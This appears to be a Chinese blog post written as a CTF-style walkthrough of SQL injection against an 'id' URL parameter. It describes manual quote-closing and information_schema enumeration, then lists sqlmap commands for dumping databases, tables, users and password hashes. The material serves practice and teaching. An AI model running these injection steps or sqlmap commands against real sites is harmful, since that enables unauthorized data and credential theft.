目录
手动注入
注入类型是否为字符型注入,在输入id=1的时候发现输出结果为id=’1’,判断类型为字符串形
需要让语句闭合,正常执行,在url结尾输入%23 或者--+,正常闭合,%23为#,注释后面的语句,一定要注意“ ' ”英文输入下,否则容易爆错
判断列数,发现是两列
库名为sqli
爆出一个news和flag两个表,开始跑列名
列名为flag ,查询列内容
【
Mysql表类型:在mysql内自带一个数据库,名为information_schema,在这个数据库内
schemata,包含了所有的数据库名字
tables,包含了所有数据库表
columns,包含了所有字段
column_name:列的名称
Information_schema.columns:表示所有的列的信息
Information_schema:表示所有信息,包括库、表、列
Information_schema.tables:表示所有的表的信息
table_schema:数据库的名称
table_name:表的名称
】
sqlmap注入
关于sqlmap的基础命令,将url修改为需要注入的url即可
查询sqlmap是否存在注入命令
sqlmap.py -u url/?id=1
查询当前用户下的所有数据库
sqlmap.py -u url/?id=1 --dbs
获取数据库的表名
sqlmap.py -u url/?id=1 -D (数据库名) --tables
获取表中的字段名
sqlmap.py -u url/?id=1 -D (数据库名) -T (输入需要查询的表名) --columns
获取字段的内容
sqlmap.py -u url/?id=1 -D (数据库名) -T (输入需要查询的表名) -C (表内的字段名) --dump
查询数据库的所有用户
sqlmap.py -u url/?id=1 --users
查询数据库的所有密码
sqlmap.py -u url/?id=1 --passwords
查询数据库名称
sqlmap.py -u url/?id=1 --current-db
5319
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
